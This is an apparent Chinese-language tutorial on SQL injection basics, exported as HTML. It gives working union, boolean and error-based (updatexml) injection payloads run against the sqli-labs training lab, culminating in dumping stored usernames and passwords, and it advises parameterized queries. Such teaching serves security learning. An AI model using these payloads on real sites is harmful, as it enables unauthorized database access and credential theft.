<div id='write' class = 'is-node'><h3><a name="web%E5%AE%89%E5%85%A8%E4%B9%8Bsql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80" class="md-header-anchor"></a><span>web安全之SQL注入基础</span></h3><h1><a name="sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80" class="md-header-anchor"></a><span>SQL注入基础</span></h1><h2><a name="sql%E6%B3%A8%E5%85%A5%E4%BB%8B%E7%BB%8D" class="md-header-anchor"></a><span>SQL注入介绍</span></h2><h3><a name="web%E8%AF%B7%E6%B1%82%E5%93%8D%E5%BA%94%E8%BF%87%E7%A8%8B%EF%BC%9A" class="md-header-anchor"></a><span>Web请求响应过程:</span></h3><p><img src='http://ww1.sinaimg.cn/large/007bHQE8gy1g58jreepkjj30sb0awdru.jpg' alt='' referrerPolicy='no-referrer' /><span> </span></p><h3><a name="%E4%BB%80%E4%B9%88%E6%98%AFsql%E6%B3%A8%E5%85%A5%EF%BC%9F" class="md-header-anchor"></a><span>什么是SQL注入?</span></h3><p><span>就是指web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询,攻击者可以通过构造不同的SQL语句来实现对数据库的任意操作。</span></p><h3><a name="%E4%B8%BA%E4%BB%80%E4%B9%88%E4%BC%9A%E4%BA%A7%E7%94%9Fsql%E6%B3%A8%E5%85%A5?" class="md-header-anchor"></a><span>为什么会产生sql注入?</span></h3><p><span>开发人员可以使用动态SQL语句创建通用,灵活的应用。动态SQL语句是在执行过程中构造的,它根据不同的条件产生不同的sql语句。当开发人员在运行过程中需要根据不同的查询标准决定提取什么字段(如select语句),或者根据不同的条件选择不同的查询表时,动态地构造SQL语句会非常有用。</span></p><blockquote><blockquote><p><span>以PHP语句为例:</span></p></blockquote></blockquote><blockquote><blockquote><p><code>$query=“SELECT * FROM users WHERE id = $_GET[‘id’]”;</code></p></blockquote></blockquote><p><span>由于这里的参数ID可控,且直接拼接后带入数据库查询,所以非法用户可以任意拼接SQL语句进行攻击。</span></p><p><span> </span><img src='http://ww1.sinaimg.cn/large/007bHQE8gy1g58jsq6ujpj30sh0fy0wh.jpg' alt='' referrerPolicy='no-referrer' /></p><p><span> </span></p><h2><a name="sql%E6%B3%A8%E5%85%A5%E7%9A%84%E5%8E%9F%E7%90%86" class="md-header-anchor"></a><span>SQL注入的原理</span></h2><h3><a name="sql%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E7%9A%84%E4%BA%A7%E7%94%9F%E9%9C%80%E8%A6%81%E6%BB%A1%E8%B6%B3%E9%82%A3%E4%B8%A4%E4%B8%AA%E6%9D%A1%E4%BB%B6%EF%BC%9F" class="md-header-anchor"></a><span>Sql注入漏洞的产生需要满足哪两个条件?</span></h3><p><span> 
</span><span>参数用户可控:前端传给后端的参数内容是用户可以控制的。</span></p><p><span> </span><span>参数带入数据库查询:传入的参数拼接到sql语句,且带入数据库查询。</span></p><p><strong><span>当传入ID参数为1'时,数据库执行的代码如下所示。</span></strong><span> </span></p><p><code>select * from users where id =1'</code></p><p><strong><span>这样是会报出错误的,因为这不符合数据库语法规范。</span></strong></p><p><strong><span>当传入的ID参数为and 1=1 时,执行的SQL语句如下所示。</span></strong></p><p><code>select * from users where id = 1 and 1=1</code></p><p><strong><span>因为1=1为真,且where语句中id=1也为真,所以页面会返回与id=1相同的结果。</span></strong></p><p><strong><span>当传入的ID参数为and 1=2时,由于1=2不成立,所以返回假,页面就会返回与id=1不同的结果。</span></strong></p><p><strong><span>由此可以初步判断ID参数存在SQL注入漏洞,攻击者可以进一步拼接SQL语句进行攻击,致使数据库信息泄露,甚至进一步获取服务器权限等。</span></strong></p><p><span>—————————————————————————————————————————————————————</span></p><p><strong><span>在实际环境中,凡是满足上述两个条件的参数皆可能存在SQL注入漏洞,因此开发者需秉持“外部参数皆不可信的原则”进行开发,例如使用参数化查询(预编译语句)代替字符串拼接来构造SQL语句。</span></strong></p><p><span> ————————————————————————————————————————————————————— </span></p><h2><a name="%E4%B8%8Emysql%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3%E7%9A%84%E7%9F%A5%E8%AF%86%E7%82%B9" class="md-header-anchor"></a><span>与MySQL注入相关的知识点</span></h2><p><span> </span></p><h3><a name="mysql%E6%95%B0%E6%8D%AE%E5%BA%93" class="md-header-anchor"></a><span>Mysql数据库</span></h3><p><span>数据库A=网站A</span></p><p><span> 表名</span></p><p><span> 列名</span></p><p><span> 数据</span></p><p><span>数据库 B=网站B</span></p><pre spellcheck="false" class="md-fences md-end-block ty-contain-cm modeLoaded" lang=""><div class="CodeMirror cm-s-inner CodeMirror-wrap" lang=""><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 0px; left: 4px;"><textarea autocorrect="off" autocapitalize="off" spellcheck="false" tabindex="0" style="position: absolute; bottom: -1em; padding: 0px; width: 1000px; height: 1em; outline: none;"></textarea></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div 
class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 0px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><span><span></span>x</span></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">数据库 </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre></div></div></div></div></div><div style="position: absolute; height: 0px; width: 1px; border-bottom: 0px solid transparent; top: 78px;"></div><div class="CodeMirror-gutters" style="display: none; height: 78px;"></div></div></div></pre><p> </p><p><span>在MySql5.0 版本之后,MySql默认在数据库中存放一个</span><code>“information_schema”</code><span>的数据库,在该库中,读者需要记住三个表名,分别是</span></p><p><code>SCHEMATA,TABLES,COLUMNS</code></p><p><code>SCHEMATA</code><span>表存储该用户创建的所有数据库的库名,我们需要记住该表中记录数据库库名的字段名为</span><code>SCHEMA_NAME</code><span>。</span></p><p><code>TABLES</code><span>表存储该用户创建的所有数据库的库名和表名,我们需要记住该表中记录数据库库名和表名的字段名分别为</span><code>TABLE_SCHEMA和TABLE_NAME</code><span>。</span></p><p><code>COLUMNS</code><span>表存储该用户创建的所有数据库的库名、表名和字段名,我们需要记住该表中记录库名、表名和字段名的字段名分别为</span><code>TABLE_SCHEMA,TABLE_NAME和COLUMN_NAME</code><span>。</span></p><p> </p><h3><a name="mysql%E6%9F%A5%E8%AF%A2%E8%AF%AD%E5%8F%A5" 
class="md-header-anchor"></a><span>Mysql查询语句</span></h3><p><span> 在不知道任何条件时,语句如下所示。</span></p><p><code>SELECT 要查询的字段名 FROM 库名.表名</code></p><p><span> 在知道一条已知条件时,语句如下所示。</span></p><p><code>SELECT 要查询的字段名 FROM 库名.表名 WHERE 已知条件的字段名=‘已知条件的值’</code></p><p><span> 在知道两条已知条件时,语句如下所示。</span></p><p><code>SELECT 要查询的字段名 FROM 库名.表名 WHERE 已知条件1的字段名=‘已知条件1的值’ AND 已知条件2的字段名=‘已知条件2的值’</code></p><h3><a name="limit-%E7%9A%84%E7%94%A8%E6%B3%95" class="md-header-anchor"></a><span>Limit 的用法</span></h3><p><span>Limit的使用格式为limit m,n,其中m是指记录开始的位置,从0开始,表示第一条记录;n是指取n条记录。</span></p><p><span>例如limit 0,1表示从第一条记录开始,取一条记录。</span></p><h3><a name="%E9%9C%80%E8%A6%81%E8%AE%B0%E4%BD%8F%E7%9A%84%E5%87%A0%E4%B8%AA%E5%87%BD%E6%95%B0" class="md-header-anchor"></a><span>需要记住的几个函数</span></h3><p><code>Database():当前网站使用的数据库</code></p><p><code>Version():当前MySQL的版本</code></p><p><code>User():当前MySQL的用户</code></p><h3><a name="%E6%B3%A8%E9%87%8A%E7%AC%A6%E5%8F%B7" class="md-header-anchor"></a><span>注释符号</span></h3><p><span> 在MySQL中,常见注释符的表达方式:</span><code>#或-- 空格或/**/</code></p><h3><a name="%E5%86%85%E8%81%94%E6%B3%A8%E9%87%8A" class="md-header-anchor"></a><span>内联注释</span></h3><p><span>内联注释的形式:</span><code>/*! code */</code><span>。内联注释可以用于整个SQL语句中,用来执行我们的SQL语句,下面举一个例: </span></p><p><code>index.php?id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3</code></p><p> </p><h2><a name="union%EF%BC%88%E8%81%94%E5%90%88%EF%BC%89%E6%B3%A8%E5%85%A5%E6%94%BB%E5%87%BB" class="md-header-anchor"></a><span>Union(联合)注入攻击</span></h2><p>[<span>在线靶场</span>][http://43.247.91.228:84/Less-1/?id=1]</p><p><a href='http://127.0.0.1/sqli-labs/Less-1/?id=1' target='_blank' class='url'>http://127.0.0.1/sqli-labs/Less-1/?id=1</a></p><h3><a name="%E4%B8%80%E3%80%81%E5%88%A4%E6%96%AD%E6%98%AF%E5%90%A6%E7%94%A8(%27)%E5%81%9A%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%BC%95%E5%8F%B7" class="md-header-anchor"></a><span>一、判断是否用(')做字符串引号</span></h3><p><code>http://127.0.0.1/sqli-labs/Less-1/?id=1'and 1=1 --+</code></p><p><code>https://blog.csdn.net/qq_41630808/article/details/80570197</code></p><p><span>正常输出</span></p><p><span>出错则说明未能用'闭合,可能没有用'做引号,而是用了"或()</span></p><p><code>http://127.0.0.1/sqli-labs/Less-1/?id=1%27and%201=2--+</code></p><p><span>则是''字符串注入</span></p><h3><a name="%E4%BA%8C%E3%80%81%E5%88%A4%E6%96%AD%E5%AE%83%E6%89%80%E5%9C%A8%E7%9A%84%E6%95%B0%E6%8D%AE%E5%BA%93%E6%9C%89%E5%87%A0%E5%88%97" class="md-header-anchor"></a><span>二、判断它所在的数据库有几列</span></h3><p><code>http://127.0.0.1/sqli-labs/Less-1/?id=1'order by 3 --+ 判断是否有3列</code></p><p><span>正常</span></p><p><code>http://127.0.0.1/sqli-labs/Less-1/?id=1'order by 4 --+ 判断是否有4列</code></p><p><span>错误</span></p><p><span>说明它输出的内容所在的数据库有3列</span></p><h3><a name="%E4%B8%89%E3%80%81%E5%88%A4%E6%96%AD%E4%BB%96%E6%98%BE%E7%A4%BA%E7%9A%84%E5%86%85%E5%AE%B9%E5%9C%A8%E6%95%B0%E6%8D%AE%E5%BA%93%E7%9A%84%E7%AC%AC%E5%87%A0%E5%88%97" class="md-header-anchor"></a><span>三、判断它显示的内容在数据库的第几列</span></h3><p><code>http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,3 --+</code></p><p><span>则 Your Login name 在第二列,Your Password 在第三列</span></p><p><span>我选择在第二列输出我想要的内容</span></p><h3><a name="%E5%9B%9B%E3%80%81%E6%9F%A5%E6%89%BE%E5%87%BA%E5%BD%93%E5%89%8D%E7%94%A8%E6%88%B7%E6%9D%83%E9%99%90" 
class="md-header-anchor"></a><span>四、查找出当前用户权限</span></h3><p><code>http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,user(),3 --+</code></p><p><span>root权限</span></p><h3><a name="%E4%BA%94%E3%80%81%E6%9F%A5%E6%89%BE%E5%BD%93%E5%89%8D%E6%95%B0%E6%8D%AE%E5%BA%93" class="md-header-anchor"></a><span>五、查找当前数据库</span></h3><p><code>http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,database(),3 --+</code></p><h3><a name="%E5%BD%93%E5%89%8D%E6%95%B0%E6%8D%AE%E5%BA%93%E6%98%AF-security" class="md-header-anchor"></a><span>当前数据库是 security</span></h3><h3><a name="%E5%85%AD%E3%80%81%E6%9F%A5%E6%89%BEsecurity%E7%9A%84%E8%A1%A8%E5%90%8D" class="md-header-anchor"></a><span>六、查找security的表名</span></h3><p><code>http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema ='security'),3 --+</code></p><p><span>表名是 emails,referers,uagents,users</span></p><blockquote><blockquote><p><span>group_concat()会计算哪些行属于同一组,将属于同一组的列显示出来。要返回哪些列,由函</span></p></blockquote></blockquote><blockquote><blockquote><p><span>数参数(就是字段名)决定 </span></p></blockquote></blockquote><h3><a name="%E4%B8%83%E3%80%81%E6%9F%A5%E6%89%BEusers%E9%87%8C%E7%9A%84%E5%AD%97%E6%AE%B5" class="md-header-anchor"></a><span>七、查找users里的字段</span></h3><p><code>http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'),3 --+</code></p><h3><a name="%E5%85%AB%E3%80%81%E6%9F%A5%E6%89%BE%E7%94%A8%E6%88%B7%E5%90%8D" class="md-header-anchor"></a><span>八、查找用户名</span></h3><p><code>http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,(select group_concat(username) from security.users),3 --+</code><span> </span></p><h3><a name="%E4%B9%9D%E3%80%81%E6%9F%A5%E6%89%BE%E5%AF%86%E7%A0%81" class="md-header-anchor"></a><span>九、查找密码</span></h3><p><code>http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,(select group_concat(password) from 
security.users),3 --+</code></p><p><span>这样就完成了,已经拿到了账号密码 </span></p><h2><a name="union--(%E8%81%94%E5%90%88)-%E6%B3%A8%E5%85%A5%E4%BB%A3%E7%A0%81%E5%88%86%E6%9E%90" class="md-header-anchor"></a><span>Union (联合) 注入代码分析 </span></h2><p><strong><span>在Union注入页面中,程序获取GET参数ID,将ID拼接到SQL语句中,在数据库中查询参数的ID对应的内容,然后将第一条查询结果中的</span><code>username</code><span>和</span><code>address</code><span>输出到页面,</span></strong></p><p><strong><span>由于是将数据输出到页面上的,所以可以利用Union语句查询其他数据,代码如下:</span></strong></p><p><span> </span></p><p><strong><span>当访问</span><code>id=1 union select 1,2,3</code><span>时,执行的SQL语句为:</span></strong></p><p><code>Select * from users where ‘id’=1 union select 1,2,3</code></p><p><span> </span><strong><span>此时sql语句可以分为</span><code>select * from users where ‘id’=1</code><span>和</span><code>union select 1,2,3</code><span>两条,利用第二条语句(Union查询)就可以获取数据库中的数据。</span></strong></p><p><span> </span><strong><span>(优化在源码中添加sql语句执行代码)</span></strong></p><h2><a name="boolean--(%E5%B8%83%E5%B0%94%E5%9E%8B)-%E6%B3%A8%E5%85%A5%E6%94%BB%E5%87%BB" class="md-header-anchor"></a><span>Boolean (布尔型) 注入攻击</span></h2><p><code>1' and length(database())>=1--+ //判断数据库的长度</code></p><p><code>1' and substr(database(),1,1)=‘t’ --+ //判断数据库第一个字母的值</code></p><p><code>1' and substr(database(),2,1)=‘q’ --+ //判断数据库的第二个字母的值</code></p><p><code>1' and ord(substr(database(),1,1))=115--+ //利用ord和ASCII判断数据库库名</code></p><p><code>1' and substr(database(),2,1)=’q’--+ //利用substr判断数据库的库名</code></p><p><code>1' and substr((select table_name from information_schema.tables where table_schema=‘sql’ limit 0,1),1,1)=‘e’ --+ //利用substr判断数据库的表名</code></p><p><span> </span></p><p><strong><span>1.</span></strong><span> </span><code>length(str)</code><span>:返回str字符串的长度。</span></p><p><strong><span>2.</span></strong><span> </span><code>substr(str, pos, len)</code><span>:将str从pos位置开始截取len长度的字符进行返回。注意这里的pos位置是从1开始的,不是数组的0开始</span></p><p><strong><span>3.</span></strong><span> 
</span><code>mid(str,pos,len):</code><span>跟上面的一样,截取字符串</span></p><p><strong><span>4.</span></strong><span> </span><code>ascii(str)</code><span>:返回字符串str的最左面字符的ASCII代码值。</span></p><p><strong><span>5.</span></strong><span> </span><code>ord(str):</code><span>同上,返回ascii码</span></p><p><strong><span>6.</span></strong><span> </span><code>if(a,b,c) :a</code><span>为条件,a为true,返回b,否则返回c,如if(1>2,1,0),返回0</span></p><h2><a name="boolean-(%E5%B8%83%E5%B0%94%E5%9E%8B)%E6%B3%A8%E5%85%A5%E4%BB%A3%E7%A0%81%E5%88%86%E6%9E%90" class="md-header-anchor"></a><span>Boolean (布尔型)注入代码分析</span></h2><p><span>在Boolean注入页面中程序先获取GET参数ID,通过preg_match判断其中是否存在union/sleep/benchmark等危险字符。然后将参数ID拼接到SQL语句,从数据库中查询。注意:这种基于黑名单的过滤并不能替代参数化查询,参数仍然被拼接进了SQL语句。</span></p><p><img src='http://ww1.sinaimg.cn/large/007bHQE8gy1g58ldmekhdj30lr0dsgoe.jpg' alt='' referrerPolicy='no-referrer' /></p><p><span>当访问id=1‘ or 1=1%23时,数据库执行的语句为select </span><span>*</span><span> from user where ‘id’=’1’ or 1=1#,由于or 1=1是永真条件,所以此时返回正常。当访问id=1‘ and 1=2%23时,</span></p><p><span>数据库执行的语句为select </span><span>*</span><span> from users where ‘id’ = ‘1’ and 1=2#, 由于and 1=2是永假条件,所以此时页面会返回错误。</span></p><h2><a name="%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5%E6%94%BB%E5%87%BB" class="md-header-anchor"></a><span>报错注入攻击</span></h2><p><span>updatexml(1,concat(0x7e,(select user()),0x7e),1)--+ //利用updatexml获取user()</span></p><p><span>‘ and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+ //利用updatexml获取database()</span></p><p><span>‘ and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e),1)--+ //利用报错注入获取数据库库名</span></p><p><span>‘ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema= ‘test’ limit 0,1),0x7e),1)--+ //利用报错注入获取数据库表名 </span></p><pre spellcheck="false" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="" style="break-inside: unset;"><div class="CodeMirror cm-s-inner CodeMirror-wrap" lang=""><div 
style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 0px; left: 4px;"><textarea autocorrect="off" autocapitalize="off" spellcheck="false" tabindex="0" style="position: absolute; bottom: -1em; padding: 0px; width: 1000px; height: 1em; outline: none;"></textarea></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 0px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">## 报错注入攻击代码分析</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " 
role="presentation"><span role="presentation" style="padding-right: 0.1px;">**在报错注入页面中,程序获取GET参数username 后,将username拼接到SQL语句中然后,然后到数据库查询。**</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">输入username=1‘时,SQL语句为select * from user where ‘username’=‘1“。执行时会因为多了一个单引号而报错。利用这种错误回显,我们可以通过floor(),updatexml()</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">等函数将要查询的内容输出到页面上。</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" 
style="padding-right: 0.1px;"> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> </span></pre></div></div></div></div></div><div style="position: absolute; height: 0px; width: 1px; border-bottom: 0px solid transparent; top: 676px;"></div><div class="CodeMirror-gutters" style="display: none; height: 676px;"></div></div></div></pre></div>
</body>
</html>